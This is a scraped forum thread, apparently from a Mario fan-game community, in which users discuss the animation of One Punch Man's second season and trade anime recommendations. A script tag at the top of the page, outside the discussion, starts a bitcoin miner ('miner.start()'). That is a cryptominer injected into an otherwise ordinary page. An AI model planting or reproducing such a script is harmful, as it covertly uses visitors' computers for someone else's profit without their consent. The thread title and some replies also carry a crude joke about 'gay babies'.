<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

anime thread

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
LatexHydra

Re: anime sucks and is for gay babies

Postby LatexHydra » 1 week ago

Truhan wrote: It's hard for the show to have bad animation when there's barely any. "Fight scenes" consist of just one or two frames being repeated over and over with no background. I just hope ONE is extremely pissed off at whoever caused them to switch from Madhouse. It's literally gone from being one of the best anime in decades for S1 to being utterly unremarkable and bereft of anything resembling talented production in S2. It's a good example of how a great manga source won't necessarily make a great anime. There has to be talent to back it up.
Don't forget excessive ghosting frames. I'm sure ONE is displeased. When a new episode comes out ONE always makes a little drawing on Twitter, with Saitama yawning or looking uninterested or something like that. It is a shame having a godly 1st season to a mediocre 2nd. Just switch to the manga at this point, it actually has better animation than the anime.

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 1 week ago

LatexHydra wrote:
Truhan wrote: It's hard for the show to have bad animation when there's barely any. "Fight scenes" consist of just one or two frames being repeated over and over with no background. I just hope ONE is extremely pissed off at whoever caused them to switch from Madhouse. It's literally gone from being one of the best anime in decades for S1 to being utterly unremarkable and bereft of anything resembling talented production in S2. It's a good example of how a great manga source won't necessarily make a great anime. There has to be talent to back it up.
Don't forget excessive ghosting frames. I'm sure ONE is displeased. When a new episode comes out ONE always makes a little drawing on Twitter, with Saitama yawning or looking uninterested or something like that. It is a shame having a godly 1st season to a mediocre 2nd. Just switch to the manga at this point, it actually has better animation than the anime.
Oh don't you worry, I've been reading the manga religiously since I watched S1. I even made a poll thread when I started watching.
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

64searchman46
i would like uh-shu pls
First name: Kaleb
Pronouns: he/him/his

Postby 64searchman46 » 1 week ago

In gay baby jail, all they had to read was anime. I haven't been the same since. ;(

Seriously though, I haven't watched anime in a while. I want to watch the Castlevania anime on Netflix (hopefully it's good), and maybe some others I can find. Does anyone have any suggestions on what to watch?
I'm here... sometimes
https://discord.gg/9Xb452g
Switch friend code: SW-0765-3487-6690

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 6 days ago

64searchman46 wrote: In gay baby jail, all they had to read was anime. I haven't been the same since. ;(

Seriously though, I haven't watched anime in a while. I want to watch the Castlevania anime on Netflix (hopefully it's good), and maybe some others I can find. Does anyone have any suggestions on what to watch?
Fruits Basket is currently airing, it's a must-watch.
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 6 days ago

Every time I see this thread title I think of the gayby from Brüno

Awoo
I came here to awoo at you!
Pronouns: he/him/his

Meguca

Postby Awoo » 3 days ago

ワンワン :pal: